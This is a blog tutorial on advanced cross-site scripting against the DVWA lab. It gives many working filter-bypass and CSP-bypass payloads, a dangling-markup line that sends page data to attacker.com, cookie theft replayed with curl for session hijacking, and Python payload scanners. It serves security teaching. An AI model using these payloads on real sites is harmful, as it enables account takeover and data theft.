Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP

avatar

Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP

leh-banner.jpg

What will I learn

  • Filter bypass techniques: encoding, tag alternatives, event handlers;
  • CSP bypass: dangling markup, script gadgets, JSONP endpoints;
  • XSS polyglots: single payloads that work in multiple injection contexts;
  • Mutation XSS (mXSS): exploiting browser HTML parser differences;
  • Using Burp Suite and XSS Hunter for advanced XSS discovery;
  • Testing XSS on DVWA at Medium and High security levels.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Your hacking lab from Episode 2 (Kali + DVWA);
  • Burp Suite Community Edition;
  • Knowledge from Episode 14 (XSS fundamentals);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Intermediate

Curriculum (of the Learn Ethical Hacking series):

Solutions to Episode 14 Exercises

Exercise 1 -- Full XSS session hijacking chain:

1. Reflected XSS on DVWA: injected <script>alert(document.cookie)</script>
   in the name parameter -- alert showed PHPSESSID and security level.

2. Stored XSS in guestbook: injected cookie-stealing Image() payload.
   Every visitor to the guestbook page triggers the cookie exfiltration.

3. Session hijacking: captured victim's PHPSESSID from cookie catcher,
   then used curl with that cookie to access DVWA:
   curl -b "PHPSESSID=stolen_value; security=low" http://target/dvwa/
   -> Logged in as victim. Full account access without credentials.

The complete chain: XSS -> cookie theft -> session hijacking takes
under 60 seconds from injection to account takeover.

The key insight: XSS is not just "popup alerts" -- it's a direct path to account takeover. The cookie IS the identity. Steal the cookie, become the user.

Exercise 2 -- XSS scanner:

import requests, sys
from urllib.parse import urlparse, parse_qs, urlencode

PAYLOADS = [
    '<script>alert(1)</script>',
    '"><img src=x onerror=alert(1)>',
    "'onmouseover='alert(1)",
    '<svg onload=alert(1)>',
    'javascript:alert(1)',
]

def scan_xss(url, cookies=None):
    parsed = urlparse(url)
    params = parse_qs(parsed.query)
    for param in params:
        for payload in PAYLOADS:
            test_params = dict(params)
            test_params[param] = [payload]
            test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{urlencode(test_params, doseq=True)}"
            resp = requests.get(test_url, cookies=cookies, timeout=10)
            if payload in resp.text:
                print(f"[+] XSS in '{param}': {payload}")

scan_xss(sys.argv[1])

The key insight: checking if the payload appears unencoded in the response is the simplest XSS detection method. If <script> goes in and <script> comes back (not &lt;script&gt;), the application isn't encoding output.

Exercise 3 -- textContent vs innerHTML:

textContent treats ALL input as plain text. When you write
"<script>alert(1)</script>" to textContent, it displays
literally as the string "<script>alert(1)</script>" on the page.
The browser never parses it as HTML.

innerHTML treats input as HTML markup. The browser's HTML parser
processes it, creating actual DOM elements -- including script tags
that execute JavaScript. This is the fundamental difference: text
vs structured markup. For user input, always use textContent unless
you specifically need HTML rendering (and if you do, sanitize first
with a library like DOMPurify).

Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP

Last episode you injected <script>alert(1)</script> into DVWA at security level Low and it worked immediately. The tag went in, the browser executed it, cookies were stolen. Beautiful. But real applications aren't that accommodating. They have input filters, WAFs, Content Security Policies, framework-level sanitization, and (sometimes) developers who actually read the OWASP cheat sheets.

Today we learn to get past all of them.

This is where XSS stops being a "beginner vulnerability" and starts being the kind of thing that wins $20,000 bug bounties on Google and Facebook. The fundamentals from episode 14 are your foundation -- now we build the house. Set your DVWA security to Medium, and let's see what breaks.

Hier we gaan.

DVWA Medium: Your First Filter

At Medium security, DVWA's reflected XSS page filters out the <script> tag. Try the classic:

<script>alert(1)</script>

Nothing happens. The tag gets stripped. The developer thought "I'll just remove <script> and the problem goes away." And for exactly that one payload, they're right. But there are hundreds of ways to execute JavaScript in HTML beyond <script>. HTML has over 50 elements that accept event handler attributes, and every single one of them can run JavaScript:

(html comment removed:  Event handler on an image that fails to load )
<img src=x onerror=alert(1)>

(html comment removed:  SVG with onload event )
<svg onload=alert(1)>

(html comment removed:  Body tag with onload )
<body onload=alert(1)>

(html comment removed:  Input with autofocus and onfocus )
<input autofocus onfocus=alert(1)>

(html comment removed:  Details element with open attribute )
<details open ontoggle=alert(1)>

(html comment removed:  Marquee (yes, it still works in most browsers) )
<marquee onstart=alert(1)>

Try <img src=x onerror=alert(1)> on DVWA Medium. It works. The filter catches <script> but doesn't know about the onerror event handler on an <img> tag. Or onload on <svg>. Or onfocus on <input>. The developer played whack-a-mole with one tag and left 50+ others wide open.

Having said that, this isn't unusual. I've seen production applications that had extensive <script> filtering but let <img onerror> through without blinking. The blocklist approach to XSS prevention is fundamentally flawed because you're trying to enumerate everything dangerous, and the list of dangerous things in HTML is enormous and keeps growing with new browser features ;-)

DVWA High: Stricter Filtering

At High security, DVWA uses a regex to strip ANY <script> tag, including case variations like <ScRiPt> and <SCRIPT>. View the source code (click "View Source" on the DVWA page) -- you'll see something like preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name). That regex catches every possible spelling of "script" by matching individual characters with wildcards between them.

But it ONLY blocks <script> variations. Everything else still works:

(html comment removed:  Still works at High security: )
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>

The lesson: blocklist-based filtering always fails. There are too many vectors, too many encoding tricks, too many browser quirks. You can build a blocklist with 200 entries and the attacker finds vector #201. The only correct approaches are allowlisting (permit only known-safe content) or output encoding (convert ALL special characters to HTML entities before rendering). We covered output encoding in episode 14 -- it's the architectural fix, same way parameterized queries are the architectural fix for SQL injection (episode 12). Band-aids vs cures.

Encoding Bypasses

When filters check for literal strings like alert or <script>, encoding can slip right past them. The trick is that the browser decodes certain encodings after the server-side filter has already checked the input:

(html comment removed:  HTML entity encoding -- browser decodes entities in attributes )
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

(html comment removed:  Mixed case (filters checking lowercase "script") )
<ScRiPt>alert(1)</ScRiPt>

(html comment removed:  Null bytes (some filters split on null) )
<scr%00ipt>alert(1)</scr%00ipt>

(html comment removed:  Double encoding (if the app decodes twice) )
%253Cscript%253Ealert(1)%253C/script%253E

(html comment removed:  JavaScript unicode escapes in event handlers )
<img src=x onerror=\u0061lert(1)>

(html comment removed:  Backtick instead of parentheses (filters blocking "(") )
<img src=x onerror=alert`1`>

The HTML entity bypass (&#97;&#108;&#101;&#114;&#116;) is particularly effective. The server-side filter sees &#97;&#108;&#101;... -- which doesn't match the string alert. But when the browser parses the HTML, it decodes the entities to alert and executes it. The filter checked the wire format; the browser interprets the decoded format. Two different parsers, two diferent views of the same data -- and that gap is exploitable.

Double encoding works when an application URL-decodes the input, then passes it through a filter, then URL-decodes it again (or passes it to another layer that decodes). %253C decodes to %3C in the first pass (still looks harmless), then %3C decodes to < in the second pass. If the filter runs between the two decode steps, it never sees the < character. This is why defense-in-depth matters: decode once, validate once, encode at output. Anything more complex creates opportunities for parser differential attacks.

XSS in Different Injection Contexts

The bypass technique depends entirely on WHERE your input lands in the HTML. This is the context problem we introduced in episode 14 -- now we go deeper:

Inside an HTML tag attribute:

(html comment removed:  Application generates: <input value="USER_INPUT"> )
(html comment removed:  Break out of the attribute: )
" onmouseover="alert(1)" x="
(html comment removed:  Result: <input value="" onmouseover="alert(1)" x=""> )

Inside a JavaScript string:

(html comment removed:  Application generates: var name = "USER_INPUT"; )
(html comment removed:  Break out of the string: )
"; alert(1); var x="
(html comment removed:  Result: var name = ""; alert(1); var x=""; )

(html comment removed:  Or close the script tag entirely: )
</script><script>alert(1)</script>

That second one -- closing the </script> tag -- is worth dwelling on. The HTML parser operates at a HIGHER priority than the JavaScript parser. When the HTML parser sees </script>, it closes the script block regardless of what the JavaScript parser thinks is happening. You could be inside a JavaScript string, a comment, a template literal -- doesn't matter. The HTML parser wins. This is a fundamental parser hierarchy issue that trips up even experienced developers who think "but the input is inside a JavaScript string, so HTML tags shouldn't matter." They do. The HTML parser sees </script> first and ends the script block, then the next <script> starts a new one.

Inside a JavaScript template literal:

Application generates: var msg = `Hello USER_INPUT`;
Payload: ${alert(1)}
Template literals evaluate expressions inside ${}

Inside an HTML comment:

(html comment removed:  Application generates: <!-- USER_INPUT ) -->
(html comment removed:  Payload: )<script>alert(1)</script>(html comment removed:  )

Understanding injection context is the single most important skill for advanced XSS. A payload that works in one context is dead text in another. This is also why automated scanners test dozens of payloads per parameter -- they're covering multiple possible contexts because they can't always determine context from the outside.

Content Security Policy Bypass

CSP is the strongest browser-side defense against XSS. When properly deployed, it blocks inline scripts, inline event handlers, javascript: URLs, and eval(). A perfect CSP makes XSS exploitation extremely difficult even when the vulnerability exists.

But CSP is rarely deployed perfectly. Here's what goes wrong:

CSP with 'unsafe-inline':

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

The unsafe-inline keyword defeats the entire purpose of CSP for XSS prevention. Inline scripts execute. Inline event handlers fire. Many applications add this because their own code uses inline scripts scattered throughout the HTML, and refactoring all of those to external .js files feels like too much work. So they deploy CSP with the one keyword that makes it useless against XSS. Schitterend.

CSP with JSONP endpoints:

If script-src includes a domain that has JSONP endpoints, you can use those endpoints to execute arbitrary code from an "allowed" origin:

(html comment removed:  CSP allows scripts from allowed-cdn.com )
(html comment removed:  That CDN has a JSONP endpoint: )
<script src="https://allowed-cdn.com/api?callback=alert(1)//"></script>

The JSONP endpoint returns alert(1)//({...}) -- your code, from an allowed domain. The // comments out the rest so it doesn't cause a syntax error. CSP sees a script loaded from a whitelisted domain and allows it. Google's CSP Evaluator tool (csp-evaluator.withgoogle.com) specifically checks for known JSONP endpoints on whitelisted domains -- it's that common a bypass.

CSP with 'unsafe-eval':

Content-Security-Policy: script-src 'self' 'unsafe-eval'

unsafe-eval allows eval(), setTimeout('code'), new Function('code'), and similar dynamic code execution. If you can inject a string that reaches any of these functions, you bypass CSP entirely. Some frameworks (particularly older Angular.js versions) require unsafe-eval to function, which means any application using those frameworks with CSP has this hole.

Dangling markup injection:

When you can inject HTML but CSP blocks all script execution, you can still exfiltrate data using dangling markup:

<img src="https://attacker.com/collect?data=

Notice the missing closing quote. The browser keeps reading the HTML source looking for that closing quote, and everything it finds becomes part of the src URL -- until it hits a matching " somewhere later in the page. If the page contains secrets (CSRF tokens, user data, API keys in hidden fields), they get included in the image request URL sent to the attacker. No JavaScript required. No CSP violation. Just HTML doing what HTML does when you leave an attribute open.

This is devious because it doesn't trigger any CSP violation reports. It's a pure HTML-level attack. The browser makes a legitimate image request to load what it thinks is an image -- the exfiltrated data rides along as a query parameter.

Mutation XSS (mXSS): When the Browser Rewrites Your Code

Mutation XSS exploits the fact that browsers don't just passively parse HTML -- they actively mutate it. The browser's HTML parser "fixes" invalid markup according to the HTML specification, and these fixes can transform safe-looking input into dangerous output.

Here's how it works: an application sanitizes user input by parsing it, checking for dangerous elements, and producing a clean DOM tree. Safe so far. But when that DOM tree gets serialized back to HTML (via innerHTML), the browser may restructure the markup in ways the sanitizer didn't predict. The sanitized version looked safe. The mutated version is dangerous.

A classic mXSS example:

(html comment removed:  Input that passes sanitization: )
<svg><p><style><img src=x onerror=alert(1)>

(html comment removed:  The sanitizer sees: an SVG containing a paragraph containing
     a style block containing what looks like CSS text (the img tag
     is treated as text inside style). Looks safe. )

(html comment removed:  But the browser's parser treats SVG and HTML differently.
     When switching from SVG context to HTML context, the parser
     re-interprets the content. The <img> breaks out of the style
     context and becomes a real HTML element with an executable
     event handler. )

The mutation happens because HTML parsing rules are context-dependent. Inside SVG, certain elements are treated as foreign content. When the parser switches back to HTML mode (which happens at the <p> tag -- <p> is not valid SVG), the parsing rules change. What was treated as inert text in one context becomes executable markup in another.

DOMPurify (the most widely used HTML sanitizer) has had multiple mXSS bypasses over the years. Each one gets patched, and then researchers find new mutation vectors. It's an arms race between the sanitizer's model of the parser and the actual parser behavior across different browsers. Chrome, Firefox, and Safari can all produce different mutations from the same input because their parser implementations differ in edge cases. If the sanitizer tests against one browser's behavior but the victim uses a different browser, the mutation bypass might only work in the victim's browser.

This is advanced stuff. mXSS research requires deep understanding of the HTML5 parsing specification (a 600+ page document full of state machines and special cases). But even knowing that mXSS exists is important -- it means that even applications using DOMPurify or similar sanitizers can have XSS vulnerabilities, because the sanitizer's model of HTML parsing is inherently an approximation.

XSS Polyglots

A polyglot is a single payload designed to execute in multiple injection contexts simultaneously. Instead of crafting context-specific payloads, you throw one string at the target and it attempts to trigger XSS regardless of whether it lands in an HTML body, a tag attribute, a JavaScript string, or a URL context:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//

This payload attempts break-out sequences for almost every context at once. It's ugly, it's clever, and it's the security researcher's Swiss army knife for initial testing when you don't know where your input ends up. If it pops an alert, you know XSS exists. Then you can craft a clean, context-specific payload for actual exploitation.

A simpler polyglot that covers the most common cases:

'"><img src=x onerror=alert(1)>

The '" breaks out of both single and double-quoted attribute values. The > closes any open tag. The <img> with onerror executes JavaScript without needing <script>. Simple, effective, works in most reflected injection scenarios. This is typically the first thing I test on any input field -- if this comes back in the response unencoded, you've almost certianly got reflected XSS ;-)

Advanced XSS Discovery with Burp Suite

In episode 11 we used Burp Suite as an HTTP proxy to intercept and modify requests. For XSS hunting, Burp's Intruder feature automates payload injection across parameters:

  1. Capture a request to the vulnerable page in Burp's Proxy
  2. Send it to Intruder (right-click -> "Send to Intruder")
  3. Mark the injection point (the parameter value you want to fuzz)
  4. Load an XSS payload list (Burp includes several, or use one from PayloadsAllTheThings on Github)
  5. Start the attack -- Intruder sends one request per payload
  6. Sort results by response length or search for your payloads in responses

The free Burp Suite Community Edition limits Intruder speed (throttled requests), but it's enough for lab work. For DVWA:

Target: http://192.168.56.101/dvwa/vulnerabilities/xss_r/
Parameter: name
Payload list: XSS basic payloads (50-100 common vectors)
Grep match: "alert" (to flag responses containing unencoded payloads)

Burp also has a Scanner (Pro edition only) that automatically crawls applications and tests for XSS and other vulnerabilities. The scanner uses a technique called "in-band detection" -- it injects unique canary strings, checks if they appear in the response, then follows up with actual XSS payloads only for parameters that reflect input. This two-phase approach is much more efficient than blindly throwing payloads at every parameter.

XSS Hunter (xsshunter.trufflesecurity.com) is a specialized tool for detecting blind XSS -- cases where your payload executes in a context you can't directly see, like an admin panel, a logging dashboard, or an internal report viewer. You inject an XSS Hunter payload (a JavaScript snippet that phones home to the XSS Hunter service), and if it ever executes anywhere, you get an alert with a screenshot of the page, the DOM content, cookies, and the URL where it fired.

Blind XSS is more common than you'd think. Submit a support ticket with a payload in the description. If the support agent's internal dashboard renders the ticket HTML unsafely, your payload fires in THEIR browser, inside the admin panel. Same with error logs (application logs your malicious input, admin views the logs in a web-based log viewer that doesn't encode output), feedback forms, user profile fields viewed by moderators, invoice comments viewed by accounting teams. Anywhere your input travels through the system and gets rendered later by someone else.

Automated XSS Discovery with Python

Building on the scanner from Episode 14, here's a more comprehensive approach that detects injection context before selecting payloads:

#!/usr/bin/env python3
"""
Advanced XSS payload tester with context detection.
Tests reflected XSS across multiple injection contexts.
"""
import requests
import re
from urllib.parse import quote

PAYLOADS_BY_CONTEXT = {
    'html_body': [
        '<script>alert(1)</script>',
        '<img src=x onerror=alert(1)>',
        '<svg onload=alert(1)>',
        '<details open ontoggle=alert(1)>',
    ],
    'html_attribute': [
        '" onmouseover="alert(1)" x="',
        "' onfocus='alert(1)' autofocus='",
        '" autofocus onfocus="alert(1)',
    ],
    'javascript_string': [
        '";alert(1);//',
        "';alert(1);//",
        '</script><script>alert(1)</script>',
    ],
}

def detect_context(response_text, marker):
    """Detect where in the HTML our input was reflected."""
    contexts = []
    if f'value="{marker}"' in response_text or f"value='{marker}'" in response_text:
        contexts.append('html_attribute')
    if f'var ' in response_text and marker in response_text:
        contexts.append('javascript_string')
    if marker in response_text:
        contexts.append('html_body')
    return contexts

def test_url(url, param, cookies=None):
    """Test a parameter for XSS across detected contexts."""
    marker = "XSS_TEST_7x7x7"
    resp = requests.get(url.replace(f"{param}=", f"{param}={marker}"),
                       cookies=cookies, timeout=10)

    if marker not in resp.text:
        print(f"[-] Input not reflected for '{param}'")
        return

    contexts = detect_context(resp.text, marker)
    print(f"[*] Input reflected in contexts: {contexts}")

    for ctx in contexts:
        for payload in PAYLOADS_BY_CONTEXT.get(ctx, []):
            test_resp = requests.get(
                url.replace(f"{param}=", f"{param}={quote(payload)}"),
                cookies=cookies, timeout=10)
            if payload in test_resp.text:
                print(f"  [+] XSS ({ctx}): {payload[:60]}")

The context detection is crude (string matching) but effective as a first pass. A real scanner like Burp Suite uses more sophisticated heuristics -- parsing the full HTML, checking whether the reflection is inside a tag attribute, a script block, or raw HTML body content. But even this simple approach catches the majority of reflected XSS in practice.

The Real-World Impact

Bug bounty programs consistently pay highest for stored XSS (affects all users) and XSS that bypasses CSP. Google's Vulnerability Reward Program has paid millions for XSS findings. Facebook's bug bounty regularly awards $5,000-$20,000 for stored XSS.

Why so much for "just" XSS? Because on platforms with millions of users, a single stored XSS vulnerability can be weaponized to steal sessions, spread self-propagating worms, or deface content at scale. The Samy Worm (MySpace, 2005) infected 1 million profiles in 20 hours using a single stored XSS vulnerability. Samy Kamkar found that MySpace's XSS filters blocked <script> but allowed <div> with a style attribute containing an expression() -- a CSS expression that executed JavaScript in Internet Explorer. His worm added "Samy is my hero" to every infected profile and sent a friend request to Samy from each victim. It bypassed MySpace's word filters by splitting blocked keywords across CSS properties and using JavaScript string concatenation to reconstruct them. One vulnerability, one million victims, 20 hours. Ongelooflijk.

Could it happen again on modern platforms? The exact same technique wouldn't work -- CSS expressions are long dead, and modern frameworks auto-escape output by default. But the principle hasn't changed. In 2019, a stored XSS worm spread through TweetDeck (a Twitter client). In 2021, researchers demonstrated self-propagating XSS in Zoom's web client. The attack surface has shifted from simple HTML injection to framework-specific bypass techniques, but the fundamental category of vulnerability persists. Every time a developer writes dangerouslySetInnerHTML in React, they're re-opening the same door MySpace left open in 2005.

And this ties back to what we covered in episode 6 -- AI code assistants generate innerHTML and dangerouslySetInnerHTML with disturbing regularity because those are the "simple" solutions that appear most often in training data. The AI-generated code works perfectly in development. It just also executes attacker-controlled input in production.

The Full Picture: XSS Attack Chain

At this point in the series, you understand the complete XSS attack methodology. Let me lay it out as a structured approach:

  1. Identify reflection points -- find where your input appears in the response (Burp Repeater, manual testing, or the Python scanner)
  2. Determine injection context -- HTML body, attribute, JavaScript string, template literal, URL, CSS?
  3. Test basic payloads -- start with the polyglot, then use context-specific payloads
  4. Bypass filters -- encoding tricks, tag alternatives, null bytes, double encoding
  5. Bypass CSP -- check for unsafe-inline, JSONP endpoints, unsafe-eval, or use dangling markup
  6. Craft the exploit -- session hijacking, keylogging, phishing form injection, or worm propagation
  7. Deploy and capture -- set up your capture server, deliver the payload, collect the data

This is the same methodology professional pentesters use. The difference between a script kiddie running <script>alert(1)</script> and a skilled security researcher is steps 2 through 6 -- understanding context, bypassing defenses, and crafting payloads that work in the real world where things are never as simple as DVWA at Low security.

We're going to keep building on these web exploitation fundamentals as the series continues. There are entire categories of attacks that interact with XSS in interesting ways -- attacks where the victim's browser performs actions on their behalf without them knowing, server-side vulnerabilities that chain with client-side bugs, and authentication weaknesses that XSS makes trivially exploitable. The web attack surface goes deep.

Exercises

Exercise 1: Test DVWA's reflected XSS at ALL security levels (Low, Medium, High). Find a working payload for EACH level. Document: what filter was added at each level, what payload bypassed it, and WHY the bypass works. Then look at DVWA's source code (click "View Source" on each level) and identify the exact filtering code. Save your analysis in ~/lab-notes/dvwa-xss-levels.md.

Exercise 2: Build an XSS payload delivery and capture system: (a) a Python HTTP server that logs every request with full headers and query parameters, (b) an XSS payload that captures the victim's cookies, current URL, and browser user-agent, sending all three to your capture server in a single request. Test the full chain on DVWA (Low security). How much information can you exfiltrate from a single XSS injection? Save the capture server as ~/pentest-tools/xss_capture.py.

Exercise 3: Research the Samy Worm (MySpace XSS worm, 2005). Document: (a) the exact XSS vulnerability it exploited (CSS expression() in IE), (b) how it bypassed MySpace's filters (keyword splitting, string concatenation), (c) how it propagated (what did the worm's JavaScript do to each victim's profile?), (d) the scale of impact (1 million profiles in 20 hours), (e) what modern defense would have prevented it (CSP alone would have killed it). Write your findings in ~/lab-notes/samy-worm-analysis.md.


Filters zijn muren. Hackers zijn water. Water vindt altijd een weg.

@scipio



0
0
0.000
1 comments
avatar

Thanks for your contribution to the STEMsocial community. Feel free to join us on discord to get to know the rest of us!

Please consider delegating to the @stemsocial account (85% of the curation rewards are returned).

Consider setting @stemsocial as a beneficiary of this post's rewards if you would like to support the community and contribute to its mission of promoting science and education on Hive. 
 

0
0
0.000